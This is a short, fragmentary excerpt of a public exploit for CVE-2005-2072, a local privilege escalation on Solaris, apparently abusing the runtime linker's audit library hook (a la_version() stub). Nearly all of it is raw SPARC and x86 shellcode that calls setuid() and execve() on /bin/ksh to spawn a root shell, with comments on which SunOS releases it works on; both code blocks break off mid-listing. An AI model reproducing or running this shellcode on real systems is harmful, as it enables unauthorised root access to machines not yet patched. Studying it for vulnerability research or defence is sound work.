CVE-2005-2072

/* Solaris 9 on SPARC: $ cat dupac */ char sh[] = /* setuid() */ "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* execve() */ "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20" "\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14" "\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh"; int la_version() { void (*f) ...

/* - SunOS 510 Generic i86pc i386 i86pc - SunOS 59 Generic_112233-12 sun4u It does NOT work on: SunOS 58 Generic_117350-02 sun4u sparc Example on unpatched Solaris 10 (AMD64): atari:venglin:~> cat dupac */ static char sh[] = "\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0 ...